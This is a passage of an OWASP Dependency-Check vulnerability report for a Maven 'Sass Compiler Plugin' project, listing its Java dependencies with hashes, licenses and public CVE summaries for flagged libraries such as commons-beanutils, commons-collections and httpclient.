Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.

Project: Sass Compiler Plugin

Scan Information (show all):

Display: Showing Vulnerable Dependencies (click to show all)

Dependency CPE GAV Highest Severity CVE Count CPE Confidence Evidence Count
antlr-2.7.2.jar antlr:antlr:2.7.2   0 10
aopalliance-1.0.jar aopalliance:aopalliance:1.0   0 12
backport-util-concurrent-3.1.jar backport-util-concurrent:backport-util-concurrent:3.1   0 15
classworlds-1.1-alpha-2.jar classworlds:classworlds:1.1-alpha-2   0 16
jsr305-2.0.1.jar com.google.code.findbugs:jsr305:1.3.7   0 18
guava-18.0.jar com.google.guava:guava:18.0   0 18
guice-4.0-no_aop.jar com.google.inject:guice:4.0   0 19
commons-beanutils-1.8.3.jar cpe:/a:apache:commons_beanutils:1.8.3 commons-beanutils:commons-beanutils:1.8.3 High 1 LOW 24
commons-chain-1.1.jar commons-chain:commons-chain:1.1   0 18
commons-codec-1.3.jar commons-codec:commons-codec:1.3   0 19
commons-collections-3.2.1.jar cpe:/a:apache:commons_collections:3.2.1 commons-collections:commons-collections:3.2.1 High 1 HIGHEST 24
commons-digester-1.8.1.jar commons-digester:commons-digester:1.8.1   0 24
commons-io-2.5.jar commons-io:commons-io:2.5   0 27
commons-lang-2.4.jar commons-lang:commons-lang:2.4   0 24
commons-logging-1.2.jar commons-logging:commons-logging:1.2   0 25
commons-validator-1.4.1.jar commons-validator:commons-validator:1.4.1   0 26
dom4j-1.1.jar dom4j:dom4j:1.1   0 14
jsr250-api-1.0.jar javax.annotation:jsr250-api:1.0   0 12
cdi-api-1.0.jar javax.enterprise:cdi-api:1.0   0 18
javax.inject-1.jar javax.inject:javax.inject:1   0 12
commons-lang3-3.4.jar org.apache.commons:commons-lang3:3.4   0 27
httpclient-4.0.2.jar cpe:/a:apache:httpclient:4.0.2 org.apache.httpcomponents:httpclient:4.0.2 Medium 2 LOW 20
httpcore-4.0.1.jar org.apache.httpcomponents:httpcore:4.0.1   0 18
doxia-core-1.6.jar org.apache.maven.doxia:doxia-core:1.6   0 19
doxia-decoration-model-1.6.jar org.apache.maven.doxia:doxia-decoration-model:1.6   0 19
doxia-logging-api-1.7.jar org.apache.maven.doxia:doxia-logging-api:1.7   0 19
doxia-module-fml-1.6.jar org.apache.maven.doxia:doxia-module-fml:1.6   0 19
doxia-module-xhtml-1.6.jar org.apache.maven.doxia:doxia-module-xhtml:1.6   0 19
doxia-sink-api-1.7.jar org.apache.maven.doxia:doxia-sink-api:1.7   0 19
doxia-site-renderer-1.6.jar org.apache.maven.doxia:doxia-site-renderer:1.6   0 19
maven-aether-provider-3.3.9.jar org.apache.maven:maven-aether-provider:3.3.9   0 19
maven-artifact-manager-2.2.1.jar org.apache.maven:maven-artifact-manager:2.2.1   0 18
maven-artifact-3.3.9.jar org.apache.maven:maven-artifact:3.3.9   0 18
maven-builder-support-3.3.9.jar org.apache.maven:maven-builder-support:3.3.9   0 19
maven-core-3.3.9.jar cpe:/a:apache:maven:3.3.9 org.apache.maven:maven-core:3.3.9   0 LOW 19
maven-model-builder-3.3.9.jar org.apache.maven:maven-model-builder:3.3.9   0 19
maven-model-3.3.9.jar org.apache.maven:maven-model:3.3.9   0 19
maven-plugin-api-3.3.9.jar org.apache.maven:maven-plugin-api:3.3.9   0 19
maven-plugin-registry-2.2.1.jar org.apache.maven:maven-plugin-registry:2.2.1   0 18
maven-profile-2.2.1.jar org.apache.maven:maven-profile:2.2.1   0 18
maven-project-2.2.1.jar org.apache.maven:maven-project:2.2.1   0 19
maven-repository-metadata-3.3.9.jar org.apache.maven:maven-repository-metadata:3.3.9   0 19
maven-settings-builder-3.3.9.jar org.apache.maven:maven-settings-builder:3.3.9   0 19
maven-settings-3.3.9.jar org.apache.maven:maven-settings:3.3.9   0 19
maven-plugin-annotations-3.4.jar org.apache.maven.plugin-tools:maven-plugin-annotations:3.4   0 19
maven-reporting-api-3.0.jar org.apache.maven.reporting:maven-reporting-api:3.0   0 20
maven-reporting-impl-2.4.jar org.apache.maven.reporting:maven-reporting-impl:2.4   0 20
maven-shared-utils-0.8.jar org.apache.maven.shared:maven-shared-utils:0.8   0 18
maven-shared-utils-0.8.jar/META-INF/maven/commons-io/commons-io/pom.xml commons-io:commons-io:2.2   0 8
wagon-provider-api-2.10.jar org.apache.maven.wagon:wagon-provider-api:2.10   0 19
struts-core-1.3.8.jar cpe:/a:apache:struts:1.3.8 org.apache.struts:struts-core:1.3.8 High 1 HIGHEST 18
struts-taglib-1.3.8.jar cpe:/a:apache:struts:1.3.8 org.apache.struts:struts-taglib:1.3.8 High 1 HIGHEST 18
struts-tiles-1.3.8.jar cpe:/a:apache:struts:1.3.8
cpe:/a:apache:tiles:1.3.8
org.apache.struts:struts-tiles:1.3.8 High 1 HIGHEST 18
velocity-tools-2.0.jar org.apache.velocity:velocity-tools:2.0   0 19
velocity-1.5.jar org.apache.velocity:velocity:1.5   0 20
plexus-classworlds-2.5.2.jar org.codehaus.plexus:plexus-classworlds:2.5.2   0 19
plexus-component-annotations-1.6.jar org.codehaus.plexus:plexus-component-annotations:1.6   0 17
plexus-container-default-1.0-alpha-9-stable-1.jar org.codehaus.plexus:plexus-container-default:1.0-alpha-9-stable-1   0 16
plexus-i18n-1.0-beta-7.jar org.codehaus.plexus:plexus-i18n:1.0-beta-7   0 16
plexus-interpolation-1.21.jar org.codehaus.plexus:plexus-interpolation:1.21   0 16
plexus-utils-3.0.22.jar org.codehaus.plexus:plexus-utils:3.0.22   0 17
plexus-velocity-1.1.7.jar org.codehaus.plexus:plexus-velocity:1.1.7   0 16
aether-api-1.0.2.v20150114.jar org.eclipse.aether:aether-api:1.0.2.v20150114   0 19
aether-impl-1.0.2.v20150114.jar org.eclipse.aether:aether-impl:1.0.2.v20150114   0 19
aether-spi-1.0.2.v20150114.jar cpe:/a:eclipse:eclipse_ide:1.0.2.v20150114 org.eclipse.aether:aether-spi:1.0.2.v20150114 Medium 2 LOW 19
aether-util-1.0.2.v20150114.jar org.eclipse.aether:aether-util:1.0.2.v20150114   0 19
org.eclipse.sisu.inject-0.3.2.jar org.eclipse.sisu:org.eclipse.sisu.inject:0.3.2   0 19
org.eclipse.sisu.plexus-0.3.2.jar org.eclipse.sisu:org.eclipse.sisu.plexus:0.3.2   0 19
jruby-complete-9.1.2.0.jar cpe:/a:jruby:jruby:9.1.2.0 org.jruby:jruby-complete:9.1.2.0 Medium 1 LOW 14
jruby-complete-9.1.2.0.jar: jffi-1.2.dll   0 2
jruby-complete-9.1.2.0.jar: jffi-1.2.dll   0 2
jruby-complete-9.1.2.0.jar: jrubyw.exe   0 1
jruby-complete-9.1.2.0.jar: jar-dependencies-0.3.2.gemspec   0 9
jruby-complete-9.1.2.0.jar: jruby-openssl-0.9.15-java.gemspec cpe:/a:jruby:jruby:0.9.15
cpe:/a:openssl:openssl:0.9.15
High 78 LOW 9
jruby-complete-9.1.2.0.jar: json-1.8.3-java.gemspec cpe:/a:jruby:jruby:1.8.3 Medium 1 LOW 9
jruby-complete-9.1.2.0.jar: minitest-5.4.1.gemspec   0 9
jruby-complete-9.1.2.0.jar: net-telnet-0.1.1.gemspec   0 9
jruby-complete-9.1.2.0.jar: power_assert-0.2.3.gemspec   0 9
jruby-complete-9.1.2.0.jar: psych-2.0.17-java.gemspec   0 9
jruby-complete-9.1.2.0.jar: racc-1.4.13-java.gemspec   0 9
jruby-complete-9.1.2.0.jar: rake-10.4.2.gemspec   0 9
jruby-complete-9.1.2.0.jar: rdoc-4.2.0.gemspec cpe:/a:dave_thomas:rdoc:4.2.0   0 LOW 9
jruby-complete-9.1.2.0.jar: test-unit-3.1.1.gemspec   0 9
jruby-complete-9.1.2.0.jar: Rakefile   0 1
jruby-complete-9.1.2.0.jar: jline-2.11.jar jline:jline:2.11   0 13
jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll   0 1
jruby-complete-9.1.2.0.jar: jline-2.11.jar: jansi.dll   0 1
jruby-complete-9.1.2.0.jar: joda-time-2.3.jar joda-time:joda-time:2.3   0 22
jruby-complete-9.1.2.0.jar: jopenssl.jar cpe:/a:jruby:jruby:0.9.15
cpe:/a:openssl:openssl:0.9.15
rubygems:jruby-openssl:0.9.15 High 78 LOW 9
jruby-complete-9.1.2.0.jar: generator.jar   0 3
jruby-complete-9.1.2.0.jar: parser.jar   0 3
jruby-complete-9.1.2.0.jar: bcpkix-jdk15on-1.54.jar org.bouncycastle:bcpkix-jdk15on:1.54   0 26
jruby-complete-9.1.2.0.jar: bcprov-jdk15on-1.54.jar cpe:/a:bouncycastle:bouncy-castle-crypto-package:1.54
cpe:/a:bouncycastle:bouncy_castle_crypto_package:1.54
org.bouncycastle:bcprov-jdk15on:1.54   0 LOW 26
jruby-complete-9.1.2.0.jar: snakeyaml-1.14.jar org.yaml:snakeyaml:1.14   0 17
jruby-complete-9.1.2.0.jar: psych.jar   0 4
jruby-complete-9.1.2.0.jar: cparse-jruby.jar cpe:/a:jruby:jruby:- High 3 LOW 3
jruby-complete-9.1.2.0.jar: readline.jar cpe:/a:jruby:jruby:1.0 rubygems:jruby-readline:1.0 High 3 HIGHEST 12
jruby-complete-9.1.2.0.jar: pr-zlib.gemspec   0 8
jruby-complete-9.1.2.0.jar: Rakefile   0 1
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jffi/pom.xml com.github.jnr:jffi:1.2.12   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-constants/pom.xml com.github.jnr:jnr-constants:0.9.2   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-enxio/pom.xml com.github.jnr:jnr-enxio:0.12   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-ffi/pom.xml com.github.jnr:jnr-ffi:2.0.9   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-netdb/pom.xml com.github.jnr:jnr-netdb:1.1.5   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-posix/pom.xml com.github.jnr:jnr-posix:3.0.29   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-unixsocket/pom.xml com.github.jnr:jnr-unixsocket:0.12   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.github.jnr/jnr-x86asm/pom.xml com.github.jnr:jnr-x86asm:1.0.2   0 5
jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/invokebinder/pom.xml com.headius:invokebinder:1.7   0 4
jruby-complete-9.1.2.0.jar/META-INF/maven/com.headius/options/pom.xml com.headius:options:1.4   0 4
jruby-complete-9.1.2.0.jar/META-INF/maven/com.jcraft/jzlib/pom.xml cpe:/a:jcraft:jzlib:1.1.3 com.jcraft:jzlib:1.1.3   0 LOW 6
jruby-complete-9.1.2.0.jar/META-INF/maven/com.martiansoftware/nailgun-server/pom.xml com.martiansoftware:nailgun-server:0.9.1   0 7
jruby-complete-9.1.2.0.jar/META-INF/maven/joda-time/joda-time/pom.xml joda-time:joda-time:2.8.2   0 6
jruby-complete-9.1.2.0.jar/META-INF/maven/org.jruby.joni/joni/pom.xml org.jruby.joni:joni:2.1.10   0 5
plexus-cipher-1.4.jar org.sonatype.plexus:plexus-cipher:1.4   0 17
plexus-sec-dispatcher-1.3.jar org.sonatype.plexus:plexus-sec-dispatcher:1.3   0 17
oro-2.0.8.jar oro:oro:2.0.8   0 12
sslext-1.2-0.jar cpe:/a:apache:struts:1.2.0 sslext:sslext:1.2-0 High 3 LOW 12
xmlunit-1.5.jar xmlunit:xmlunit:1.5   0 12

Dependencies

antlr-2.7.2.jar

File Path: /var/tmp/maven-repo/antlr/antlr/2.7.2/antlr-2.7.2.jar
MD5: a73459120df5cadf75eaa98453433a01
SHA1: 546b5220622c4d9b2da45ad1899224b6ce1c8830
Referenced In Project: Sass Compiler Plugin

Identifiers

aopalliance-1.0.jar

Description: AOP Alliance

License:

Public Domain
File Path: /var/tmp/maven-repo/aopalliance/aopalliance/1.0/aopalliance-1.0.jar
MD5: 04177054e180d09e3998808efa0401c7
SHA1: 0235ba8b489512805ac13a8f9ea77a1ca5ebe3e8
Referenced In Project: Sass Compiler Plugin

Identifiers

backport-util-concurrent-3.1.jar

Description: Dawid Kurzyniec's backport of JSR 166

License:

Public Domain: http://creativecommons.org/licenses/publicdomain
File Path: /var/tmp/maven-repo/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.jar
MD5: 748bb0cbf4780b2e3121dc9c12e10cd9
SHA1: 682f7ac17fed79e92f8e87d8455192b63376347b
Referenced In Project: Sass Compiler Plugin

Identifiers

classworlds-1.1-alpha-2.jar

File Path: /var/tmp/maven-repo/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.jar
MD5: 82cacb7d9724c4a4e4d20f004884d4da
SHA1: 05adf2e681c57d7f48038b602f3ca2254ee82d47
Referenced In Project: Sass Compiler Plugin

Identifiers

jsr305-2.0.1.jar

Description: JSR305 Annotations for Findbugs

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.jar
MD5: 144c0767e2aaf0c21a935908d0e52c68
SHA1: 516c03b21d50a644d538de0f0369c620989cd8f0
Referenced In Project: Sass Compiler Plugin

Identifiers

guava-18.0.jar

Description:  Guava is a suite of core and expanded libraries that include utility classes, google's collections, io classes, and much much more. Guava has only one code dependency - javax.annotation, per the JSR-305 spec.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/com/google/guava/guava/18.0/guava-18.0.jar
MD5: 947641f6bb535b1d942d1bc387c45290
SHA1: cce0823396aa693798f8882e64213b1772032b09
Referenced In Project: Sass Compiler Plugin

Identifiers

guice-4.0-no_aop.jar

Description: Guice is a lightweight dependency injection framework for Java 6 and above

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/com/google/inject/guice/4.0/guice-4.0-no_aop.jar
MD5: 64ff538a6b272442aa00a5d0707ca1d9
SHA1: 199b7acaa05b570bbccf31be998f013963e5e752
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-beanutils-1.8.3.jar

Description: BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
MD5: b45be74134796c89db7126083129532f
SHA1: 686ef3410bcf4ab8ce7fd0b899e832aaba5facf7
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2014-0114  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions: (show all)

commons-chain-1.1.jar

Description: An implmentation of the GoF Chain of Responsibility pattern

License:

The Apache Software License, Version 2.0: /LICENSE.txt
File Path: /var/tmp/maven-repo/commons-chain/commons-chain/1.1/commons-chain-1.1.jar
MD5: d4ce482153073855e7c6453dc3c725cb
SHA1: 3038bd41dcdb2b63b8c6dcc8c15f0fdf3f389012
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-codec-1.3.jar

Description: The codec package contains simple encoder and decoders for various formats such as Base64 and Hexadecimal. In addition to these widely used encoders and decoders, the codec package also maintains a collection of phonetic encoding utilities.

License:

The Apache Software License, Version 2.0: /LICENSE.txt
File Path: /var/tmp/maven-repo/commons-codec/commons-codec/1.3/commons-codec-1.3.jar
MD5: 8e149c1053741c03736a52df83974dcc
SHA1: fd32786786e2adb664d5ecc965da47629dca14ba
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-collections-3.2.1.jar

Description: Types that extend and augment the Java Collections Framework.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
MD5: 13bc641afd7fd95e09b260f69c1e4c91
SHA1: 761ea405b9b37ced573d2df0d1e3a4e0f9edc668
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2015-6420  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Serialized-object interfaces in certain Cisco Collaboration and Social Media; Endpoint Clients and Client Software; Network Application, Service, and Acceleration; Network and Content Security Devices; Network Management and Provisioning; Routing and Switching - Enterprise and Service Provider; Unified Computing; Voice and Unified Communications Devices; Video, Streaming, TelePresence, and Transcoding Devices; Wireless; and Cisco Hosted Services products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.

Vulnerable Software & Versions: (show all)

commons-digester-1.8.1.jar

Description:  The Digester package lets you configure an XML to Java object mapping module which triggers certain actions called rules whenever a particular pattern of nested XML elements is recognized.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-digester/commons-digester/1.8.1/commons-digester-1.8.1.jar
MD5: 5002ecf033f5a79e398155823badb36a
SHA1: 3dec9b9c7ea9342d4dbe8c38560080d85b44a015
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-io-2.5.jar

Description:  The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-io/commons-io/2.5/commons-io-2.5.jar
MD5: e2d74794fba570ec2115fb9d5b05dc9b
SHA1: 2852e6e05fbb95076fc091f6d1780f1f8fe35e0f
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-lang-2.4.jar

Description:  Commons Lang, a package of Java utility classes for the classes that are in java.lang's hierarchy, or are considered to be so standard as to justify existence in java.lang.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-lang/commons-lang/2.4/commons-lang-2.4.jar
MD5: 237a8e845441bad2e535c57d985c8204
SHA1: 16313e02a793435009f1e458fa4af5d879f6fb11
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-logging-1.2.jar

Description: Apache Commons Logging is a thin adapter allowing configurable bridging to other, well known logging systems.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
MD5: 040b4b4d8eac886f6b4a2a3bd2f31b00
SHA1: 4bfc12adfe4842bf07b657f0369c4cb522955686
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-validator-1.4.1.jar

Description:  Apache Commons Validator provides the building blocks for both client side validation and server side data validation. It may be used standalone or with a framework like Struts.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/commons-validator/commons-validator/1.4.1/commons-validator-1.4.1.jar
MD5: 4b20b04c1f967af1a115fdefcbe70109
SHA1: 2231238e391057a53f92bde5bbc588622c1956c3
Referenced In Project: Sass Compiler Plugin

Identifiers

dom4j-1.1.jar

File Path: /var/tmp/maven-repo/dom4j/dom4j/1.1/dom4j-1.1.jar
MD5: f1c39d0d2b2c6f5ffb0046841a34b5c9
SHA1: 0690b3108a502c8f033ea87e7278aec309ffa668
Referenced In Project: Sass Compiler Plugin

Identifiers

jsr250-api-1.0.jar

Description: JSR-250 Reference Implementation by Glassfish

License:

COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html
File Path: /var/tmp/maven-repo/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar
MD5: 4cd56b2e4977e541186de69f5126b4a6
SHA1: 5025422767732a1ab45d93abfea846513d742dcf
Referenced In Project: Sass Compiler Plugin

Identifiers

cdi-api-1.0.jar

Description: APIs for JSR-299: Contexts and Dependency Injection for Java EE

File Path: /var/tmp/maven-repo/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar
MD5: 462c0959f0322016495f4598243bc0f2
SHA1: 44c453f60909dfc223552ace63e05c694215156b
Referenced In Project: Sass Compiler Plugin

Identifiers

javax.inject-1.jar

Description: The javax.inject API

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/javax/inject/javax.inject/1/javax.inject-1.jar
MD5: 289075e48b909e9e74e6c915b3631d2e
SHA1: 6975da39a7040257bd51d21a231b76c915872d38
Referenced In Project: Sass Compiler Plugin

Identifiers

commons-lang3-3.4.jar

Description:  Apache Commons Lang, a package of Java utility classes for the classes that are in java.lang's hierarchy, or are considered to be so standard as to justify existence in java.lang.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/tmp/maven-repo/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar
MD5: 8667a442ee77e509fbe8176b94726eb2
SHA1: 5fe28b9518e58819180a43a850fbc0dd24b7c050
Referenced In Project: Sass Compiler Plugin

Identifiers

httpclient-4.0.2.jar

Description:  HttpComponents Client (base module)

License:

Apache License: ../LICENSE.txt
File Path: /var/tmp/maven-repo/org/apache/httpcomponents/httpclient/4.0.2/httpclient-4.0.2.jar
MD5: d685d72de1a8305bd84c5d6b002214b7
SHA1: 781b68c2fd5335de914166241b8d4bfe8c2f91b7
Referenced In Project: Sass Compiler Plugin

Identifiers

CVE-2015-5262  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

http/conn/ssl/SSLConnectionSocketFactory.java in Apache HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2014-3577  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)

org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a "CN=" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the "foo,CN=www.apache.org" string in the O field.

Vulnerable Software & Versions: (show all)

httpcore-4.0.1.jar

Description:  HttpComponents Core (Java 1.3 compatible)

License:

Apache License: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /var/tmp/maven-repo/org/apache/httpcomponents/httpcore/4.0.1/httpcore-4.0.1.jar
MD5: 6c1963fd8ac0c40c004c9e892e0d7703
SHA1: e813b8722c387b22e1adccf7914729db09bcb4a9
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-core-1.6.jar

Description: Doxia core classes and interfaces.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-core/1.6/doxia-core-1.6.jar
MD5: b6de6f089320d64d2520e61ebdb0202b
SHA1: 61dd1084ec7d093086db714537439b02c76f0deb
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-decoration-model-1.6.jar

Description: The Decoration Model handles the decoration descriptor for sites, also known as site.xml.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-decoration-model/1.6/doxia-decoration-model-1.6.jar
MD5: ee947d775ed462ae4405e1b091b75c97
SHA1: 5143fc30d9b6e6b8636212b5caf4139f1b68ad2f
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-logging-api-1.7.jar

Description: Doxia Logging API.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-logging-api/1.7/doxia-logging-api-1.7.jar
MD5: 685d0eddaa6c6e6828863b985f25d7cf
SHA1: 026b1ace473b018f4b0053f7d525ddd1cfb777df
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-module-fml-1.6.jar

Description:  A Doxia module for FML source documents. FML format is only supported as source format.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-module-fml/1.6/doxia-module-fml-1.6.jar
MD5: 8ee4f701bebf5ae903258753daf007e1
SHA1: 67e3faa49307e003ba717eb53330aeb02861de19
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-module-xhtml-1.6.jar

Description:  A Doxia module for Xhtml source documents. Xhtml format is supported both as source and target formats.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-module-xhtml/1.6/doxia-module-xhtml-1.6.jar
MD5: 7a6ac991e2fa35a6d9af5f75f975fe55
SHA1: 71dc8d1ce4c5fcd976aecb8339e331ba9f46f7e3
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-sink-api-1.7.jar

Description: Doxia Sink API.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-sink-api/1.7/doxia-sink-api-1.7.jar
MD5: 77ed4a3d25c0e5c8c8908880868b2fc4
SHA1: 64482f540f8f45c0749b2febdb78ee3148a52b58
Referenced In Project: Sass Compiler Plugin

Identifiers

doxia-site-renderer-1.6.jar

Description: The Site Renderer handles the rendering of sites, merging site decoration with document content.

File Path: /var/tmp/maven-repo/org/apache/maven/doxia/doxia-site-renderer/1.6/doxia-site-renderer-1.6.jar
MD5: 3e973ac502710a58a7f05db3676854e6
SHA1: 99ca276310172f91700577383730090c285c5126
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-aether-provider-3.3.9.jar

Description: Extensions to Aether for utilizing Maven POM and repository metadata.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-aether-provider/3.3.9/maven-aether-provider-3.3.9.jar
MD5: a59398f1c07cdb0acb7241c912277727
SHA1: 29e8e7122f7a166ea53785cd75af0ef9d4d848d4
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-artifact-manager-2.2.1.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-artifact-manager/2.2.1/maven-artifact-manager-2.2.1.jar
MD5: f3e76a8a83f422a900886543c48914f7
SHA1: ec355b913c34d37080810f98e3f51abecbe1572b
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-artifact-3.3.9.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar
MD5: eabb57cd2980b2776fa4c441307ea60c
SHA1: 0f43afa184555fbc6e36b3334b17246c39b30f6e
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-builder-support-3.3.9.jar

Description: Support for descriptor builders (model, setting, toolchains)

File Path: /var/tmp/maven-repo/org/apache/maven/maven-builder-support/3.3.9/maven-builder-support-3.3.9.jar
MD5: 2e6239035784eaa473c2254906499b73
SHA1: a96f29da7623c0e1db9824f628548fe8181f6dd0
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-core-3.3.9.jar

Description: Maven Core classes.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-core/3.3.9/maven-core-3.3.9.jar
MD5: 26ca8120bcd92b50cd3eeaf72857f10b
SHA1: 47154012330ea639849c618ebc11cff6870e570a
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-model-builder-3.3.9.jar

Description: The effective model builder, with inheritance, profile activation, interpolation, ...

File Path: /var/tmp/maven-repo/org/apache/maven/maven-model-builder/3.3.9/maven-model-builder-3.3.9.jar
MD5: 1f2574146387b9bf42d8c6f474c31dc0
SHA1: e2055f9adb9f3c9a93e6b36fffe79781a785de2d
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-model-3.3.9.jar

Description: Model for Maven POM (Project Object Model)

File Path: /var/tmp/maven-repo/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar
MD5: 7cad05127acd17c06329852e268f92e7
SHA1: 6efde8cbcb4de4c47f7e9c2a3ab2806022b5c70f
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-plugin-api-3.3.9.jar

Description: The API for plugins - Mojos - development.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar
MD5: 2de70681e18aae4f174b0760e4e69281
SHA1: aa706ea7ca23776861b4eb2cea97cf345e791496
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-plugin-registry-2.2.1.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-plugin-registry/2.2.1/maven-plugin-registry-2.2.1.jar
MD5: 46a27ab81d327e3f5fd1d3e435fe2aad
SHA1: 72a24b7775649af78f3986b5aa7eb354b9674cfd
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-profile-2.2.1.jar

File Path: /var/tmp/maven-repo/org/apache/maven/maven-profile/2.2.1/maven-profile-2.2.1.jar
MD5: 53dd14e28aaad4bd5dd379dfdbf46a4c
SHA1: 3950071587027e5086e9c395574a60650c432738
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-project-2.2.1.jar

Description: This library is used to not only read Maven project object model files, but to assemble inheritence and to retrieve remote models as required.

File Path: /var/tmp/maven-repo/org/apache/maven/maven-project/2.2.1/maven-project-2.2.1.jar
MD5: 8f9382d7c0c120e94c2aaf8bbe817b6f
SHA1: 8239e98c16f641d55a4ad0e0bab0aee3aff8933f
Referenced In Project: Sass Compiler Plugin

Identifiers

maven-repository-metadata-3.3.9.jar

Description: Per-directory local and remote repository metadata.

